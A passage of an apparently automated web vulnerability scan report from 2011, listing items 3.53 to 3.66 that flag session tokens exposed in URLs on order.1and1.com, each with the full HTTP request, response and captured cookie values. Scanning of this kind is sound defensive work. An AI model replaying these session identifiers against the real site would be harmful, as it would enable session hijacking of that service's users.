<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.53. http://order.1and1.com/xml/order/FeatureSite-buildingCnba  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.54. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingContentmoduls

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingContentmoduls;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.55. http://order.1and1.com/xml/order/FeatureSite-buildingDriving  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDriving

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingDriving;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDriving?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.56. http://order.1and1.com/xml/order/FeatureSite-buildingDsc  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingDsc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDsc?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.57. http://order.1and1.com/xml/order/FeatureSite-buildingElements  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingElements;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingElements?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.58. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMailinglist

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingMailinglist;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.59. http://order.1and1.com/xml/order/FeatureSite-buildingMap  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:34 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMap?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.60. http://order.1and1.com/xml/order/FeatureSite-buildingNet  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingNet

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingNet;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:06 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingNet?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.61. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.62. http://order.1and1.com/xml/order/FeatureSite-buildingRss  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingRss

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingRss;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingRss?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.63. http://order.1and1.com/xml/order/FeatureSite-buildingWsb  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingWsb;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingWsb?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.64. http://order.1and1.com/xml/order/FeatureToolsRatepoint  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureToolsRatepoint

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureToolsRatepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureToolsRatepoint?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.65. http://order.1and1.com/xml/order/FeatureWebdesignIstock  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebdesignIstock

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureWebdesignIstock;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureWebdesignIstock?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.66. http://order.1and1.com/xml/order/FeatureWebspaceExplorer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
